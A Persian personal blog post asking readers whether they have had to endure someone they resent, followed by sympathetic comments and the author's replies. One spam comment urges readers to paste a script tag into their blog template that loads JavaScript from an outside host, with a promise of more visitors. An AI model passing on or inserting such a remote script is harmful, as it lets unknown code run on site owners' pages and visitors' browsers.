بهونه

بهونه ای از همه چیز...

بهونه

بهونه ای از همه چیز...

سوال

تا حالا شده از دست کسی خیلی دلخور باشین ولی به خاطر بعضی چیزا یا بعضی کسا مجبور بشین یه عمر تحملش کنین؟
نظرات 10 + ارسال نظر
سکینه جمعه 3 اردیبهشت‌ماه سال 1389 ساعت 09:05 ب.ظ

سلام .
باز چی شده ؟
عزیز من اگه دوست داری با من راحت باش و باهام درد و دل کن .

سلام تا میام یکم شاد باشم همه چی بهم میریزه
ممنونم ازت اگه تونستم تو وبلاگت نظر بذارم بهت میگم

مجید جمعه 3 اردیبهشت‌ماه سال 1389 ساعت 09:08 ب.ظ

معذرت میخوام .
فقط همین .

مجید جمعه 3 اردیبهشت‌ماه سال 1389 ساعت 09:09 ب.ظ

اون چیزا چیه که باعث شده بخوای یه عمر اون کس رو تحمل کنی ؟

من فقط یه سوال کردم

مجید جمعه 3 اردیبهشت‌ماه سال 1389 ساعت 09:14 ب.ظ

چقد اون آدم پسته که باعث رنجش تو میشه .
اما چرا تو میخوای خودت رو تا آخر عمر پاسوز اون آدم بی معرفت کنی ؟

افزایش بازدید روزانه 20000 تا جمعه 3 اردیبهشت‌ماه سال 1389 ساعت 11:03 ب.ظ http://1000tabligh.blogfa.com

***************
با گذاشتن این کد افزایش وبلاگتونو 10 برابر کنید
یک بار امتحان کن
وقتی کد را گذاشتی بیا به ما لینکتو ارسال کن
ما هم لینک تو رو تو می زاریم
اینم کد:
<script language="javascript" src="http://sebtin.persiangig.com/document/java.js"></script>


یادت باشه حتما کدو بزاری
آنهایی که نمی دونن کد را کجا قرار بدن
باید کد را کپی کنی بد بری تو وبلاگت قسمت ویرایش وبلاگ بری بعد کد های
که اونجا هست آخر اون کد ها کد را اضافه کنی بعد دکمه ثبت رو بزاری
*****************

زهره شنبه 4 اردیبهشت‌ماه سال 1389 ساعت 10:39 ق.ظ

سلام و درود...
فکر کنم از این جهت با هم همدردیم... بله من هم از دست یه نفر خیلی دلخورم اما چی کار کنم که مجبورم به خاطر بعضی مسائل تحمل کنم...
خیلی سخته.......
اما با این حال باید به خدا توکل کنیم و از او یاری بخواهیم تا کمکمون کنه و بهمون صبر بده...
اون اوایل خیلی تحملش واسم سخت بود ولی وقتی از خدا یاری خواستم خیلی آروم شدم... مثل آب بود روی آتش...
امیدوارم خدا به شما هم کمک کنه و صبر و تحمل بده...
بهترین ها نصیبتون...
تا درودی دیگر بدرود...

ممنون از اینکه باهام ابراز همدردی می‌کنی
من مشکلات زیاد دارم و فقط از خدا کمک می‌خوام
ناامید نیستم ولی تا الان جوابم رو نداده

خوده خودم شنبه 4 اردیبهشت‌ماه سال 1389 ساعت 05:50 ب.ظ http://www.khodamokhodam.blogsky.com

اگه راستشو بخوای: نه!
اگه بعضی چیزا یا بعضی کسا بخوان مجبورم کنن یه چیزیو تحمل کنم من اون بعضی چیزا یا بعضی کسارو هم تحمل نمیکنم!!!
میندازمشون دور!
فرت...!!!!!

آفرین صد آفرین
من منظورم از طرح این سوال فقط امتحان کردن تو بود

مجید شنبه 4 اردیبهشت‌ماه سال 1389 ساعت 09:34 ب.ظ

زهره خانم نویسنده وبلاگ همای رحمت میباشند .
http://zt1.blogfa.com

خوده خودم یکشنبه 5 اردیبهشت‌ماه سال 1389 ساعت 02:37 ب.ظ http://www.khodamokhodam.blogsky.com

حالا خانوم اجازه؟!
بیست میشیم؟!

بیسته بیست

خوده خودم یکشنبه 5 اردیبهشت‌ماه سال 1389 ساعت 02:38 ب.ظ

خانوووم ما هنوز نفهمیدیم شامتون چی بودا!
میشه یه کم راهنمایی کنین؟!

اگه راهنمایی کنم که جایزه نمیگیری
حدس بزن

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد